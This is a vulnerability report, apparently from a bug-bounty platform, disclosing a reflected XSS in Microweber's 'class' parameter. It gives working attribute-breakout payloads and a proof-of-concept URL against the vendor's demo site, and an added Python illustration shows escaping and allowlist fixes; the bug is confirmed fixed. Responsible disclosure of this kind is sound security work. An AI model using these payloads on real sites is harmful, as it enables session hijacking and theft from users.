Cross-site Scripting (XSS) - Reflected in microweber/microweber
Reported on
Jan 2nd 2022
Description
XSS (Cross-Site Scripting) is a vulnerability that allows an attacker to execute arbitrary JavaScript in the victim's browser. Here the value of the class query parameter is reflected into an HTML attribute without escaping, so a single quote in the value closes the attribute and the remainder of the payload is parsed as an additional event-handler attribute.
PAYLOAD for Firefox: a' onafterscriptexecute=alert(document.domain) c='a
(requires no user interaction)
PAYLOAD for all major browsers: a' onclick=alert(document.domain) c='a
(requires user interaction)
NOTE: I'm using Firefox, so I used the first payload in the PoC. You can refer to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet to see which XSS payloads can be triggered in other browsers.
Proof of Concept
- In Firefox, visit
https://demo.microweber.org/demo/module/?module=admin%2Fmodules%2Fmanage&id=zaasdasdasd"+onmousemove%3dalert(1)+cc="asd&data-show-ui=admin&class=a%27+onafterscriptexecute%3dalert(document.domain)+c%20%3d'aa&from_url=https://demo.microweber.org
An alert pops up showing the domain name, confirming that the injected handler ran in the origin of demo.microweber.org.
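As an added illustration (not code from this report or from Microweber), the attribute breakout behind the payload above alongside two defensive fixes, written in Python rather than the project's PHP: html.escape(..., quote=True) plays the role of htmlspecialchars with ENT_QUOTES, the allowlist validator rejects anything that is not a CSS class token, and the parser check is what a tester would use to confirm that the escaped render exposes only the class attribute.

```python
import html
import re
from html.parser import HTMLParser
from typing import List, Optional

# Constructed sample: the single-quote breakout payload quoted in the report above.
PAYLOAD = "a' onafterscriptexecute=alert(document.domain) c='a"

# A `class` value should only ever be space-separated CSS class tokens.
CLASS_TOKEN = re.compile(r"^-?[A-Za-z_][A-Za-z0-9_-]*$")


def render_unsafe(cls: str) -> str:
    """Vulnerable pattern: the query value is concatenated straight into an attribute."""
    return "<div class='" + cls + "'>"


def render_escaped(cls: str) -> str:
    """Hardened: attribute-context escaping encodes both quote characters
    (quote=True is the Python counterpart of PHP's ENT_QUOTES)."""
    return "<div class='" + html.escape(cls, quote=True) + "'>"


def validate_class_param(value: str) -> Optional[str]:
    """Stricter alternative: allowlist the parameter rather than encode arbitrary input.
    Returns the normalised value, or None if any token is not a CSS class name."""
    tokens = value.split()
    if not tokens or not all(CLASS_TOKEN.match(t) for t in tokens):
        return None
    return " ".join(tokens)


class _AttrCollector(HTMLParser):
    """Collects the attribute names a browser-like parser actually sees."""

    def __init__(self) -> None:
        super().__init__()
        self.names: List[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.names.extend(name for name, _ in attrs)


def parsed_attribute_names(markup: str) -> List[str]:
    """Verification check: a safe render of one `class` attribute yields ['class']
    only; extra event-handler names mean the value broke out of the attribute."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.names
```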
Impact
The attacker can execute arbitrary JavaScript in the victim's session and achieve, for example, the following:
- Steal the user's CSRF token and perform unintended actions on their behalf, such as buying a product.
- Run malicious JavaScript such as cryptocurrency miners.
and many more...
Hi, thanks for the report, we will fix it and post when it's ready
https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
Yes, it looks fixed.
Can you please validate this bug? There will be a button on the right side of this report.
@maintainer